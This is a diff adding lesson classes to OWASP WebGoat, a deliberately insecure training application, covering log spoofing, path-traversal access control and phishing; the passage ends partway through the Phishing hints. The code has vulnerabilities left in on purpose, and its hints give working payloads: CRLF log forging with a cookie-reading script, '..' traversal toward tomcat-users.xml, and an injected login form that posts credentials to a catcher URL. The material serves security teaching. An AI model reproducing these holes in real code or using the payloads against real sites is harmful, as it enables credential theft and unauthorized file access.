+import org.apache.ecs.html.TR;
+import org.apache.ecs.html.Table;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ *
+ * @author     Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
+ * @created    October 28, 2003
+ */
+public abstract class LessonAdapter extends AbstractLesson
+{
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  s  Description of the Parameter
+     * @return    Description of the Return Value
+     */
+    protected Element createContent(WebSession s)
+    {
+	// Mark this lesson as completed.  
+	makeSuccess(s);
+
+	ElementContainer ec = new ElementContainer();
+
+	ec
+		.addElement(new Center().addElement(new H3()
+			.addElement(new StringElement(
+				"Detailed Lesson Creation Instructions."))));
+	ec.addElement(new P());
+	ec
+		.addElement(new StringElement(
+			"Lesson are simple to create and very little coding is required. &nbsp;&nbsp;"
+				+ "In fact, most lessons can be created by following the easy to use instructions in the "
+				+ "<A HREF=http://www.owasp.org/index.php/WebGoat_User_and_Install_Guide_Table_of_Contents>WebGoat User Guide.</A>&nbsp;&nbsp;"
+				+ "If you would prefer, send your lesson ideas to "
+				+ getWebgoatContext().getFeedbackAddress()));
+
+	String fileName = s.getContext().getRealPath(
+		"doc/New Lesson Instructions.txt");
+	if (fileName != null)
+	{
+	    try
+	    {
+		PRE pre = new PRE();
+		BufferedReader in = new BufferedReader(new FileReader(fileName));
+		String line = null;
+		while ((line = in.readLine()) != null)
+		{
+		    pre.addElement(line + "\n");
+		}
+		ec.addElement(pre);
+	    }
+	    catch (Exception e)
+	    {
+	    	e.printStackTrace();
+	    }
+	}
+	return (ec);
+    }
+
+
+    /**
+     *  Gets the category attribute of the LessonAdapter object. The default category is "General" Only
+     *  override this method if you wish to create a new category or if you wish this lesson to reside
+     *  within a category other the "General"
+     *
+     * @return    The category value
+     */
+    protected Category getDefaultCategory()
+    {
+	return Category.GENERAL;
+    }
+
+
+    protected boolean getDefaultHidden()
+    {
+	return false;
+    }
+
+    private final static Integer DEFAULT_RANKING = new Integer(1000);
+
+
+    protected Integer getDefaultRanking()
+    {
+	return DEFAULT_RANKING;
+    }
+
+
+    /**
+     *  Gets the hintCount attribute of the LessonAdapter object
+     *
+     * @return    The hintCount value
+     */
+    public int getHintCount(WebSession s)
+    {
+	return getHints(s).size();
+    }
+
+
+    /**
+     *  Fill in a minor hint that will help people who basically get it, but are stuck on somthing
+     *  silly. Hints will be returned to the user in the order they appear below. The user must click
+     *  on the "next hint" button before the hint will be displayed.
+     *
+     * @return    The hint1 value
+     */
+    protected List<String> getHints(WebSession s)
+    {
+	List<String> hints = new ArrayList<String>();
+	hints.add("There are no hints defined.");
+
+	return hints;
+    }
+
+
+    public String getHint(WebSession s, int hintNumber)
+    {
+	return (String) getHints(s).get(hintNumber);
+    }
+
+
+    /**
+     *  Gets the credits attribute of the AbstractLesson object
+     *
+     * @return    The credits value
+     */
+    public Element getCredits()
+    {
+    	return new StringElement();
+    }
+
+
+    /**
+     *  Gets the instructions attribute of the LessonAdapter object. Instructions will rendered as html
+     *  and will appear below the control area and above the actual lesson area. Instructions should
+     *  provide the user with the general setup and goal of the lesson.
+     *
+     * @return    The instructions value
+     */
+    public String getInstructions(WebSession s)
+    {
+	StringBuffer buff = new StringBuffer();
+	try
+	{
+	    String fileName = s.getWebResource(getLessonPlanFileName());
+	    if (fileName != null)
+	    {
+		BufferedReader in = new BufferedReader(new FileReader(fileName));
+		String line = null;
+		boolean startAppending = false;
+		while ((line = in.readLine()) != null)
+		{
+		    if (line.indexOf("<!-- Start Instructions -->") != -1)
+		    {
+			startAppending = true;
+			continue;
+		    }
+		    if (line.indexOf("<!-- Stop Instructions -->") != -1)
+		    {
+			startAppending = false;
+			continue;
+		    }
+		    if (startAppending)
+		    {
+			buff.append(line + "\n");
+		    }
+		}
+	    }
+	}
+	catch (Exception e)
+	{}
+
+	return buff.toString();
+
+    }
+
+
+    /**
+     *  Fill in a descriptive title for this lesson. The title of the lesson. This will appear above
+     *  the control area at the top of the page. This field will be rendered as html.
+     *
+     * @return    The title value
+     */
+    public String getTitle()
+    {
+	return "Untitled Lesson " + getScreenId();
+    }
+
+
+    public String getCurrentAction(WebSession s)
+    {
+	return s.getLessonSession(this).getCurrentLessonScreen();
+    }
+
+
+    public void setCurrentAction(WebSession s, String lessonScreen)
+    {
+	s.getLessonSession(this).setCurrentLessonScreen(lessonScreen);
+    }
+
+
+    public Object getSessionAttribute(WebSession s, String key)
+    {
+	return s.getRequest().getSession().getAttribute(key);
+    }
+
+
+    public void setSessionAttribute(WebSession s, String key, Object value)
+    {
+	s.getRequest().getSession().setAttribute(key, value);
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  s  Description of the Parameter
+     * @return    Description of the Return Value
+     */
+    protected Element makeSuccess(WebSession s)
+    {
+	getLessonTracker(s).setCompleted(true);
+
+	s
+		.setMessage("Congratulations. You have successfully completed this lesson.");
+
+	return (null);
+    }
+
+
+    /**
+     *  Gets the credits attribute of the AbstractLesson object
+     *
+     * @return    The credits value
+     */
+    protected Element getCustomCredits(String text, Element e)
+    {
+		Table t = new Table().setCellSpacing(0).setCellPadding(0).setBorder(0).setWidth("90%").setAlign("RIGHT");
+		TR tr = new TR();
+		tr.addElement(new TD(text).setVAlign("MIDDLE").setAlign("RIGHT").setWidth("100%"));
+		tr.addElement(new TD(e).setVAlign("MIDDLE").setAlign("RIGHT"));
+		t.addElement(tr);
+		return t;
+    }
+    
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/LogSpoofing.java b/main/project/JavaSource/org/owasp/webgoat/lessons/LogSpoofing.java
new file mode 100644
index 000000000..13081b3af
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/LogSpoofing.java
@@ -0,0 +1,174 @@
+package org.owasp.webgoat.lessons;
+
+import java.io.UnsupportedEncodingException;
+import java.net.URLDecoder;
+import java.util.ArrayList;
+import java.util.List;
+
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.apache.ecs.HtmlColor;
+import org.apache.ecs.StringElement;
+import org.apache.ecs.html.IMG;
+import org.apache.ecs.html.Input;
+import org.apache.ecs.html.PRE;
+import org.apache.ecs.html.TD;
+import org.apache.ecs.html.TR;
+import org.apache.ecs.html.Table;
+import org.owasp.webgoat.session.ECSFactory;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ * 
+ * @author     Sherif Koussa <a href="http://www.macadamian.com">Macadamian Technologies</a>
+ * @created    October 28, 2006
+ */
+
+public class LogSpoofing extends LessonAdapter
+{
+
+    private static final String USERNAME = "username";
+
+    private static final String PASSWORD = "password";
+
+    private final static IMG MAC_LOGO = new IMG("images/logos/macadamian.gif").setAlt(
+    "Macadamian Technologies").setBorder(0).setHspace(0).setVspace(0);
+
+    protected Element createContent(WebSession s)
+    {
+
+	ElementContainer ec = null;
+	String inputUsername = null;
+	try
+	{
+
+	    Table t = new Table(0).setCellSpacing(0).setCellPadding(0)
+		    .setBorder(0);
+	    TR row1 = new TR();
+	    TR row2 = new TR();
+	    TR row3 = new TR();
+
+	    row1.addElement(new TD(new StringElement("Username: ")));
+	    Input username = new Input(Input.TEXT, USERNAME, "");
+	    row1.addElement(new TD(username));
+
+	    row2.addElement(new TD(new StringElement("Password: ")));
+	    Input password = new Input(Input.PASSWORD, PASSWORD, "");
+	    row2.addElement(new TD(password));
+
+	    Element b = ECSFactory.makeButton("Login");
+	    row3.addElement(new TD(new StringElement("&nbsp; ")));
+	    row3.addElement(new TD(b)).setAlign("right");
+
+	    t.addElement(row1);
+	    t.addElement(row2);
+	    t.addElement(row3);
+
+	    ec = new ElementContainer();
+	    ec.addElement(t);
+
+	    inputUsername = new String(s.getParser().getRawParameter(USERNAME,
+		    ""));
+	    if (inputUsername.length() != 0)
+	    {
+		inputUsername = URLDecoder.decode(inputUsername, "UTF-8");
+	    }
+
+	    ec.addElement(new PRE(" "));
+
+	    Table t2 = new Table(0).setCellSpacing(0).setCellPadding(0)
+		    .setBorder(0);
+	    TR row4 = new TR();
+	    row4.addElement(
+		    new TD(new PRE("Login failed for username: "
+			    + inputUsername))).setBgColor(HtmlColor.GRAY);
+
+	    t2.addElement(row4);
+
+	    ec.addElement(t2);
+
+	    if (inputUsername.length() != 0
+		    && inputUsername.toUpperCase().indexOf(
+			    System.getProperty("line.separator")
+				    + "LOGIN SUCCEEDED FOR USERNAME:") >= 0)
+	    {
+		makeSuccess(s);
+	    }
+	}
+	catch (UnsupportedEncodingException e)
+	{
+	    s.setMessage("Error generating " + this.getClass().getName());
+	    e.printStackTrace();
+	}
+	return ec;
+    }
+
+    private final static Integer DEFAULT_RANKING = new Integer(72);
+
+
+    protected Integer getDefaultRanking()
+    {
+	return DEFAULT_RANKING;
+    }
+
+
+    @Override
+    protected List<String> getHints(WebSession s)
+    {
+	List<String> hints = new ArrayList<String>();
+	hints.add("Try to fool the humane eye by using new lines.");
+	hints.add("Use CR (%0d) and LF (%0a) for a new line.");
+	hints.add("Try: Smith%0d%0aLogin Succeeded for username: admin");
+	hints
+		.add("Try: Smith%0d%0aLogin Succeeded for username: admin&lt;script&gt;alert(document.cookie)&lt;/script&gt;");
+
+	return hints;
+    }
+
+
+    @Override
+    public String getTitle()
+    {
+	return "Log Spoofing";
+    }
+
+
+    @Override
+    protected Category getDefaultCategory()
+    {
+	return Category.INJECTION;
+    }
+
+
+    public Element getCredits()
+    {
+	return super.getCustomCredits("Created by Sherif Koussa ", MAC_LOGO);
+    }
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/NewLesson.java b/main/project/JavaSource/org/owasp/webgoat/lessons/NewLesson.java
new file mode 100644
index 000000000..978148880
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/NewLesson.java
@@ -0,0 +1,90 @@
+package org.owasp.webgoat.lessons;
+
+import org.apache.ecs.Element;
+import org.apache.ecs.StringElement;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ * 
+ * @author     Sherif Koussa <a href="http://www.macadamian.com">Macadamian Technologies.</a>
+ * @created    October 28, 2003
+ */
+public class NewLesson extends LessonAdapter
+{
+    /**
+     *  Description of the Method
+     *
+     * @param  s  Description of the Parameter
+     * @return    Description of the Return Value
+     */
+    protected Element createContent(WebSession s)
+    {
+	return super.createContent(s);
+	//makeSuccess(s);
+	//ec.addElement(new StringElement("Welcome to the WebGoat hall of fame !!"));
+	//return (ec);
+    }
+
+
+    /**
+     *  Gets the category attribute of the NEW_LESSON object
+     *
+     * @return    The category value
+     */
+    protected Category getDefaultCategory()
+    {
+    	return Category.GENERAL;
+    }
+
+    private final static Integer DEFAULT_RANKING = new Integer(85);
+
+
+    protected Integer getDefaultRanking()
+    {
+    	return DEFAULT_RANKING;
+    }
+
+
+    /**
+     *  Gets the title attribute of the DirectoryScreen object
+     *
+     * @return    The title value
+     */
+    public String getTitle()
+    {
+	return ("Create a WebGoat Lesson");
+    }
+    
+    public Element getCredits()
+    {
+	return super.getCustomCredits("Created by: Your name goes here!", new StringElement(""));
+    }
+
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/PathBasedAccessControl.java b/main/project/JavaSource/org/owasp/webgoat/lessons/PathBasedAccessControl.java
new file mode 100644
index 000000000..2ee358c52
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/PathBasedAccessControl.java
@@ -0,0 +1,281 @@
+package org.owasp.webgoat.lessons;
+
+import java.io.BufferedReader;
+import java.io.File;
+import java.io.FileReader;
+import java.util.ArrayList;
+import java.util.List;
+
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.apache.ecs.StringElement;
+import org.apache.ecs.html.BR;
+import org.apache.ecs.html.HR;
+import org.apache.ecs.html.TD;
+import org.apache.ecs.html.TR;
+import org.apache.ecs.html.Table;
+
+import org.owasp.webgoat.session.ECSFactory;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ * 
+ * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
+ * @created October 28, 2003
+ */
+public class PathBasedAccessControl extends LessonAdapter
+{
+
+	private final static String FILE = "File";
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	protected Element createContent(WebSession s)
+	{
+		ElementContainer ec = new ElementContainer();
+
+		try
+		{
+			String dir = s.getContext().getRealPath("/lesson_plans");
+			File d = new File(dir);
+
+			Table t = new Table().setCellSpacing(0).setCellPadding(2).setWidth("90%").setAlign("center");
+
+			if (s.isColor())
+			{
+				t.setBorder(1);
+			}
+
+			String[] list = d.list();
+			String listing = " <p><B>Current Directory is:</B> " + Encoding.urlDecode(dir)
+					+ "<br><br> Choose the file to view:</p>";
+
+			TR tr = new TR();
+			tr.addElement(new TD().setColSpan(2).addElement(new StringElement(listing)));
+			t.addElement(tr);
+
+			tr = new TR();
+			tr.addElement(new TD().setWidth("35%").addElement(ECSFactory.makePulldown(FILE, list, "", 15)));
+			tr.addElement(new TD().addElement(ECSFactory.makeButton("View File")));
+			t.addElement(tr);
+
+			ec.addElement(t);
+
+			// FIXME: would be cool to allow encodings here -- hex, percent,
+			// url, etc...
+			String file = s.getParser().getRawParameter(FILE, "");
+
+			// defuse file searching
+			boolean illegalCommand = getWebgoatContext().isDefuseOSCommands();
+			if (getWebgoatContext().isDefuseOSCommands())
+			{
+				// allow them to look at any file in the webgoat hierachy. Don't
+				// allow them
+				// to look about the webgoat root, except to see the LICENSE
+				// file
+				if (upDirCount(file) == 3 && !file.endsWith("LICENSE"))
+				{
+					s.setMessage("Access denied");
+					s.setMessage("It appears that you are on the right track.  "
+							+ "Commands that may compromise the operating system have been disabled.  "
+							+ "You are only allowed to see one file in this directory. ");
+				} else if (upDirCount(file) > 3)
+				{
+					s.setMessage("Access denied");
+					s.setMessage("It appears that you are on the right track.  "
+							+ "Commands that may compromise the operating system have been disabled.  "
+							+ "You are only allowed to see files in the webgoat directory. ");
+				} else
+				{
+					illegalCommand = false;
+				}
+			}
+
+			// Using the URI supports encoding of the data.
+			// We could force the user to use encoded '/'s == %2f to make the lesson more difficult.
+			// We url Encode our dir name to avoid problems with special characters in our own path.
+			// File f = new File( new URI("file:///" +
+			// Encoding.urlEncode(dir).replaceAll("\\\\","/") + "/" +
+			// file.replaceAll("\\\\","/")) );
+			File f = new File((dir + "\\" + file).replaceAll("\\\\", "/"));
+
+			if (s.isDebug())
+			{
+
+				s.setMessage("File: " + file);
+				s.setMessage("Dir: " + dir);
+				// s.setMessage("File URI: " + "file:///" +
+				// (Encoding.urlEncode(dir) + "\\" +
+				// Encoding.urlEncode(file)).replaceAll("\\\\","/"));
+				s.setMessage("  - isFile(): " + f.isFile());
+				s.setMessage("  - exists(): " + f.exists());
+			}
+			if (!illegalCommand)
+			{
+				if (f.isFile() && f.exists())
+				{
+					// Don't set completion if they are listing files in the
+					// directory listing we gave them.
+					if (upDirCount(file) >= 1)
+					{
+						s.setMessage("Congratulations! Access to file allowed");
+						s.setMessage(" ==> " + Encoding.urlDecode(f.getCanonicalPath()));
+						makeSuccess(s);
+					} else
+					{
+						s.setMessage("File is already in allowed directory - try again!");
+						s.setMessage(" ==> " + Encoding.urlDecode(f.getCanonicalPath()));
+					}
+				} else if (file != null && file.length() != 0)
+				{
+					s.setMessage("Access to file/directory \"" + Encoding.urlDecode(f.getCanonicalPath())
+									+ "\" denied");
+				} else
+				{
+					// do nothing, probably entry screen
+				}
+
+				try
+				{
+					// Show them the file
+					// Strip out some of the extra html from the "help" file
+					ec.addElement(new BR());
+					ec.addElement(new BR());
+					ec.addElement(new HR().setWidth("100%"));
+					ec.addElement("Viewing file: " + f.getCanonicalPath());
+					ec.addElement(new HR().setWidth("100%"));
+					if (f.length() > 80000)
+					{
+						throw new Exception("File is too large");
+					}
+					String fileData = getFileText(new BufferedReader(new FileReader(f)), false);
+					if (fileData.indexOf(0x00) != -1)
+					{
+						throw new Exception("File is binary");
+					}
+					ec
+							.addElement(new StringElement(fileData.replaceAll(System.getProperty("line.separator"),
+									"<br>").replaceAll("(?s)<!DOCTYPE.*/head>", "").replaceAll("<br><br>", "<br>")
+									.replaceAll("<br>\\s<br>", "<br>").replaceAll("<\\?", "&lt;").replaceAll(
+											"<(r|u|t)", "&lt;$1")));
+				}
+				catch (Exception e)
+				{
+					ec.addElement(new BR());
+					ec.addElement("The following error occurred while accessing the file: <");
+					ec.addElement(e.getMessage());
+				}
+			}
+		}
+		catch (Exception e)
+		{
+			s.setMessage("Error generating " + this.getClass().getName());
+			e.printStackTrace();
+		}
+
+		return (ec);
+	}
+
+	private int upDirCount(String fileName)
+	{
+		int count = 0;
+		int startIndex = fileName.indexOf("..");
+		while (startIndex != -1)
+		{
+			count++;
+			startIndex = fileName.indexOf("..", startIndex + 1);
+		}
+		return count;
+	}
+
+	/**
+	 * DOCUMENT ME!
+	 * 
+	 * @return DOCUMENT ME!
+	 */
+	protected Category getDefaultCategory()
+	{
+		return Category.ACCESS_CONTROL;
+	}
+
+	/**
+	 * Gets the hints attribute of the AccessControlScreen object
+	 * 
+	 * @return The hints value
+	 */
+	protected List<String> getHints(WebSession s)
+	{
+		List<String> hints = new ArrayList<String>();
+		hints.add("Most operating systems allow special characters in the path.");
+		hints.add("Use a file explorer to find the tomcat\\webapps\\WebGoat\\lesson_plans directory");
+		hints.add("Try .. in the path");
+		hints.add("Try ..\\..\\..\\LICENSE");
+
+		return hints;
+	}
+
+	/**
+	 * Gets the instructions attribute of the WeakAccessControl object
+	 * 
+	 * @return The instructions value
+	 */
+	public String getInstructions(WebSession s)
+	{
+		String instructions = "The '" + s.getUserName() + "' user has access to all the files in the "
+				+ "lesson_plans directory.  Try to break the access control mechanism and access a "
+				+ "resource that is not in the listed directory.  After selecting a file to view, WebGoat "
+				+ "will report if access to the file was granted.  An interesting file to try and obtain might "
+				+ "be a file like tomcat/conf/tomcat-users.xml";
+
+		return (instructions);
+	}
+
+	private final static Integer DEFAULT_RANKING = new Integer(115);
+
+	protected Integer getDefaultRanking()
+	{
+		return DEFAULT_RANKING;
+	}
+
+	/**
+	 * Gets the title attribute of the AccessControlScreen object
+	 * 
+	 * @return The title value
+	 */
+	public String getTitle()
+	{
+		return ("Bypass a Path Based Access Control Scheme");
+	}
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/Phishing.java b/main/project/JavaSource/org/owasp/webgoat/lessons/Phishing.java
new file mode 100644
index 000000000..64b9a3213
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/Phishing.java
@@ -0,0 +1,299 @@
+package org.owasp.webgoat.lessons;
+
+import java.util.ArrayList;
+import java.util.List;
+
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.apache.ecs.StringElement;
+import org.apache.ecs.html.B;
+import org.apache.ecs.html.BR;
+import org.apache.ecs.html.Comment;
+import org.apache.ecs.html.H1;
+import org.apache.ecs.html.HR;
+import org.apache.ecs.html.Input;
+import org.apache.ecs.html.TD;
+import org.apache.ecs.html.TH;
+import org.apache.ecs.html.TR;
+import org.apache.ecs.html.Table;
+import org.owasp.webgoat.Catcher;
+import org.owasp.webgoat.session.ECSFactory;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ * 
+ * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
+ * @created March 13, 2007
+ */
+public class Phishing extends LessonAdapter
+{
+
+	/**
+	 * Description of the Field
+	 */
+	protected final static String SEARCH = "Username";
+	private String searchText;
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	private boolean postedCredentials(WebSession s)
+	{
+		String postedToCookieCatcher =
+				getLessonTracker(s).getLessonProperties().getProperty(Catcher.PROPERTY, Catcher.EMPTY_STRING);
+
+		// <START_OMIT_SOURCE>
+		return (!postedToCookieCatcher.equals(Catcher.EMPTY_STRING));
+		// <END_OMIT_SOURCE>
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	protected Element createContent(WebSession s)
+	{
+		ElementContainer ec = new ElementContainer();
+
+		try
+		{
+			searchText = s.getParser().getRawParameter(SEARCH, "");
+			// <START_OMIT_SOURCE>
+			// <END_OMIT_SOURCE>
+
+			ec.addElement(makeSearch(s));
+			if (postedCredentials(s))
+			{
+				makeSuccess(s);
+			}
+		}
+		catch (Exception e)
+		{
+			s.setMessage("Error generating " + this.getClass().getName());
+		}
+
+		return (ec);
+	}
+
+	protected Element makeSearch(WebSession s)
+	{
+		ElementContainer ec = new ElementContainer();
+
+		ec.addElement(new H1().addElement("WebGoat Search "));
+		Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setAlign("center");
+
+		TR tr = new TR();
+		tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
+		t.addElement(tr);
+		if (s.isColor())
+		{
+			t.setBorder(1);
+		}
+
+		tr = new TR();
+		tr.addElement(new TH().addElement("This facility will search the WebGoat source.").setColSpan(2)
+				.setAlign("center"));
+		t.addElement(tr);
+
+		tr = new TR();
+		tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
+		t.addElement(tr);
+
+		TR row1 = new TR();
+		row1.addElement(new TD(new B(new StringElement("Search: "))).setAlign("right"));
+
+		Input input1 = new Input(Input.TEXT, SEARCH, searchText);
+		row1.addElement(new TD(input1).setAlign("left"));
+		t.addElement(row1);
+
+		Element b = ECSFactory.makeButton("Search");
+		t.addElement(new TR(new TD(b).setColSpan(2)).setAlign("center"));
+		ec.addElement(t);
+
+		if (!searchText.equals(""))
+		{
+			ec.addElement(new BR());
+			ec.addElement(new HR());
+			ec.addElement(new BR());
+			ec.addElement(new StringElement("Results for: " + searchText));
+			ec.addElement(new Comment("Search results"));
+			ec.addElement(new BR());
+			ec.addElement(new BR());
+			ec.addElement(new B(new StringElement("No results were found.")));
+			ec.addElement(new Comment("End of Search results"));
+		}
+
+		return (ec);
+	}
+
+	/**
+	 * Gets the hints attribute of the CluesScreen object
+	 * 
+	 * @return The hints value
+	 */
+	protected List<String> getHints(WebSession s)
+	{
+		List<String> hints = new ArrayList<String>();
+		hints.add("Try adding HTML to the search field to create a fake authentication form.<BR>"
+				  + "Try to make the form look official.");
+		hints
+				.add("Try: <BR> "
+					 + "password&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+					 + "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; "
+					 + "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
+					 + "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
+		hints
+				.add("Add functionality that can post a request, a button might work<BR><BR>"
+					 + "After getting the button on the page, don't forget you will need to steal the credentials and post them to: <BR>"
+					 + "http://localhost./WebGoat/capture/PROPERTY=yes&ADD_CREDENTIALS_HERE");
+		hints
+				.add("Try: <BR> "
+					 + "&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
+					 + "value=&quot;login&quot;&gt;"
+					 + "<BR><BR>Solution for this hint:<BR><BR>"
+					 + "password&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+					 + "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; "
+					 + "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
+					 + "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
+					 + "value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
+		hints
+				.add("Make the button perform an action on submit, <BR>"
+					 + "adding an onclick=\"hack()\" might work<BR>"
+					 + "Don't forget to add the hack() javascript function"
+					 + "<BR><BR>Solution for this hint:<BR><BR>"
+					 + "password&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+					 + "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; "
+					 + "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
+					 + "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
+					 + "value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
+		hints
+				.add("You need to create the hack() function.  This function will pull the credentials from the "
+					 + "webpage and post them to the WebGoat catcher servlet. <BR>"
+					 + "<BR> Some useful code snippets:<UL>"
